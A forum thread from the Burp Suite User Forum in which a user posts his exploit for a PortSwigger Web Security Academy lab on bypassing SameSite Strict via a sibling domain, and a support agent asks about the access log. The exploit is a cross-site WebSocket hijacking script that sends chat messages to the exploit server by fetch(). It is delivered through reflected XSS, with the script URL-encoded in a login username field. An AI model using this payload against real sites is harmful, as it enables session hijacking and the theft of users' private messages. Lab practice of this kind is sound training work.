The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Lab: SameSite Strict bypass via sibling domain - solution is broken

Jack | Last updated: Jul 12, 2024 11:01AM UTC

Hi, this is my solution and it works fine when clicking "view exploit" (I see my messages in the access log), but when I deliver it to the victim there is no incoming request. Can you please fix the lab? I was going crazy about what the issue could be, then I realized that if it works with "view exploit" but not when delivered, then the lab is broken. I also tried with fetch, with document.location.href, etc.; all worked for me but not when delivered. GIF: https://postimg.cc/cgY3Mrv6

<script>
  // Open a WebSocket to the lab's chat and forward every received message to the exploit server's access log
  let newWebSocket = new WebSocket("wss://0a1100c20450ae4880d662fe006900e9.web-security-academy.net/chat");

  newWebSocket.onopen = function (evt) {
    newWebSocket.send("READY");
  };

  newWebSocket.onmessage = function (evt) {
    var message = evt.data;
    fetch('https://exploit-0a6700500409aed5803a618f017d00eb.exploit-server.net/exploit?message=' + btoa(message), {
      method: 'GET',
      mode: 'no-cors',
    });
  };
</script>
<script>
  // Send the browser to the CMS login page with the URL-encoded script above as the username.
  // document.location is not callable, so the navigation is done by assigning to href.
  document.location.href = "https://cms-0a1100c20450ae4880d662fe006900e9.web-security-academy.net/login?username=%3c%73%63%72%69%70%74%3e%0a%20%20%20%20%6c%65%74%20%6e%65%77%57%65%62%53%6f%63%6b%65%74%20%3d%20%6e%65%77%20%57%65%62%53%6f%63%6b%65%74%28%22%77%73%73%3a%2f%2f%30%61%31%31%30%30%63%32%30%34%35%30%61%65%34%38%38%30%64%36%36%32%66%65%30%30%36%39%30%30%65%39%2e%77%65%62%2d%73%65%63%75%72%69%74%79%2d%61%63%61%64%65%6d%79%2e%6e%65%74%2f%63%68%61%74%22%29%3b%0a%0a%20%20%20%20%6e%65%77%57%65%62%53%6f%63%6b%65%74%2e%6f%6e%6f%70%65%6e%20%3d%20%66%75%6e%63%74%69%6f%6e%20%28%65%76%74%29%20%7b%0a%20%20%20%20%20%20%20%20%6e%65%77%57%65%62%53%6f%63%6b%65%74%2e%73%65%6e%64%28%22%52%45%41%44%59%22%29%3b%0a%20%20%20%20%7d%3b%0a%0a%20%20%20%20%6e%65%77%57%65%62%53%6f%63%6b%65%74%2e%6f%6e%6d%65%73%73%61%67%65%20%3d%20%66%75%6e%63%74%69%6f%6e%20%28%65%76%74%29%20%7b%0a%20%20%20%20%20%20%20%20%76%61%72%20%6d%65%73%73%61%67%65%20%3d%20%65%76%74%2e%64%61%74%61%3b%0a%0a%20%20%20%20%66%65%74%63%68%28%27%68%74%74%70%73%3a%2f%2f%65%78%70%6c%6f%69%74%2d%30%61%36%37%30%30%35%30%30%34%30%39%61%65%64%35%38%30%33%61%36%31%38%66%30%31%37%64%30%30%65%62%2e%65%78%70%6c%6f%69%74%2d%73%65%72%76%65%72%2e%6e%65%74%2f%65%78%70%6c%6f%69%74%3f%6d%65%73%73%61%67%65%3d%27%20%2b%20%62%74%6f%61%28%6d%65%73%73%61%67%65%29%2c%20%7b%0a%20%20%20%20%20%20%20%20%6d%65%74%68%6f%64%3a%20%27%47%45%54%27%2c%0a%20%20%20%20%6d%6f%64%65%3a%20%27%6e%6f%2d%63%6f%72%73%27%2c%0a%20%20%20%20%20%20%20%20%7d%29%3b%0a%20%20%20%20%7d%3b%0a%3c%2f%73%63%72%69%70%74%3e&password=ds";
</script>

Ben, PortSwigger Agent | Last updated: Jul 15, 2024 09:43AM UTC

Hi Jack, are you seeing any interactions in the access log when you deliver your exploit?

Jack | Last updated: Jul 15, 2024 06:34PM UTC